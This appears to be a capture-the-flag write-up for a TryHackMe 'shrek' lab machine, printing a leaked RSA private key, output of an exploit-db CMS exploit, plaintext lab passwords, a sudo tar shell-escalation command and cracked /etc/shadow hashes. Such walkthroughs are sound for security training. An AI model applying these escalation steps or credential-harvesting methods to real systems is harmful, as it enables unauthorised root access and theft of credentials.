shrek

thm koth
back

shrek KOTH

SSH private key :

After enumerating I found a robots.txt file hosted at the webserver root on port 80.

http://shrek.thm/Cpxtpt2hWCee9VFa.txt

ssh shrek@shrek.thm -i <KeyFile>
-----BEGIN RSA PRIVATE KEY-----
MIIEogIBAAKCAQEAsKHyvIOqmETYwUvLDAWg4ZXHb/oTgk7A4vkUY1AZC0S6fzNE
JmewL2ZJ6ioyCXhFmvlA7GC9iMJp13L5a6qeRiQEVwp6M5AYYsm/fTWXZuA2Qf4z
8o+cnnD+nswE9iLe5xPl9NvvyLANWNkn6cHkEOfQ1HYFMFP+85rmJ2o1upHkgcUI
ONDAnRigLz2IwJHeZAvllB5cszvmrLmgJWQg2DIvL/2s+J//rSEKyISmGVBxDdRm
T5ogSbSeJ9e+CfHtfOnUShWVaa2xIO49sKtu+s5LAgURtyX0MiB88NfXcUWC7uO0
Z1hd/W/rzlzKhvYlKPZON+J9ViJLNg36HqoLcwIDAQABAoIBABaM5n+Y07vS9lVf
RtIHGe4TAD5UkA8P3OJdaHPxcvEUWjcJJYc9r6mthnxF3NOGrmRFtDs5cpk2MOsX
u646PzC3QnKWXNmeaO6b0T28DNNOhr7QJHOwUA+OX4OIio2eEBUyXiZvueJGT73r
I4Rdg6+A2RF269yqrJ8PRJj9n1RtO4FPLsQ/5d6qxaHp543BMVFqYEWvrsdNU2Jl
VUAB652BcXpBuJALUV0iBsDxbqIKFl5wIsrTNWh+hkUTwo9HroQEVd4svCN+Jr5B
Npr81WG2jbKqOx2kJVFW/yCivmr/f/XokyOLBi4N/5Wqq+JuHD0zSPTtY5K04SUd
63TWQ5kCgYEA32IwfmDwGZBhqs3+QAH7y46ByIOa632DnZnFu2IqKySpTDk6chmh
ONSfc4coKwRq5T0zofHIKLYwO8vVpJq4iQ31r+oe7fAHh08w/mBC3ciCSi6EQdm5
RMxW0i4usAuneJ04rVmWWHepADB0BqYiByWtWFYAY9Kpks/ks9yWHn8CgYEAymxD
q3xvaWFycawJ+I/P5gW8+Wr1L3VrGbBRj1uPhNF0yQcA03ZjyyViDKeT/uBfCCxX
LPoLmoLYGmisl/MGq3T0g0TtrgvkFU6qZ3sjYJ+O/yrT06HYapJLv6Ns/+98uNvi
3VEQodZNII8P6WLk3RPp1NzDVcFDLmD9C40UAQ0CgYBokPgOUKZT8Sgm4mJ/5+3M
LZtHF4PvdEOmBJNw0dTXeUPesHNRcfnsNmulksEU0e6P/IQs7Jc7p30QoKwTb3Gu
hmBZxohP7So5BrLygHEMjI2g2AGFKbv2HokNvhyQwAPXDBG549Pi+bCcrBHEAwSu
v85TKX7pO3WxiauPHlUPVQKBgFmIF0ozKKgIpPDoMiTRnxfTc+kxyK6sFanwFbL9
wXXymuALi+78D1mb+Ek2mbwDC6V2zzwigJ1fwCu2Hpi6sjmF6lxhUWtI8SIHgFFy
4ovrJvlvvO9/R1SjzoM9yolNKPIut6JCJ8QdIFIFVPlad3XdR/CRkIhOieNqnKHO
TYnFAoGAbRrJYVZaJhVzgg7H22UM+sAuL6TR6hDLqD2wA1vnQvGk8qh95Mg9+M/X
6Zmia1R6Wfm2gIGirxK6s+XOpfqKncFmdjEqO+PHr4vaKSONKB0GzLI7ZlOPPU5V
Q2FZnCyRqaHlYUKWwZBt2UYbC46sfCWapormgwo3xA8Ix/jrBBI=
-----END RSA PRIVATE KEY-----



CMS exploit :

Exploit found on exploit-db.com

https://www.exploit-db.com/exploits/46635

python exploit.py -u http://shrek.thm/cms -w ../../../../wordlist/rockyou.txt
[+] Salt for password found: 1e1b72555eb91948
[+] Username found: shrek
[+] Email found: shrek@tryhackme.com
[+] Password found: 1733c648b88ea8d8f3a66044db28d553

The password got me nowhere though, maybe you will find it useful …

So for me it was a dead end 😭



However we still have an entry point with the ssh private key.
After a bit of research I found that donkey’s password was written in a message.txt file located in the ftp folder (/var/ftp).

Now we have 2 users but only one with a password.

shrek with the ssh private key
donkey : J5rURvCa8DyTg3vR

Let’s now connect as donkey with ssh, then we check the obvious command :

sudo -l

Turns out there is a program that we can run as sudo, tar.
We will use the command from https://gtfobins.github.io/ :

sudo tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh

Finally we have root access 😃

Then to finish up I tried bruteforcing some of the password hashes found in /etc/shadow file and got those results :

hashes :

$6$b9fPcfjf$hcqCL17XbSLt6YmsQL9T1nbQVh.4qVA7aKN9bYkKuLJtvMn5eHjpOLU502d71HktxqHmCK5NZoi9Y2s26ipiU.

shrek : 12345678

$6$UKHS9n/K$VQzDqsj.6rTfYDO7pT0czxuJ3.dK/WMntYwrrpDz83l70AGddwTepQy/.mQOSMUdUWbH1t8h930e7JNjZX/1T.

donkey : J5rURvCa8DyTg3vR

Thanks for reading 😉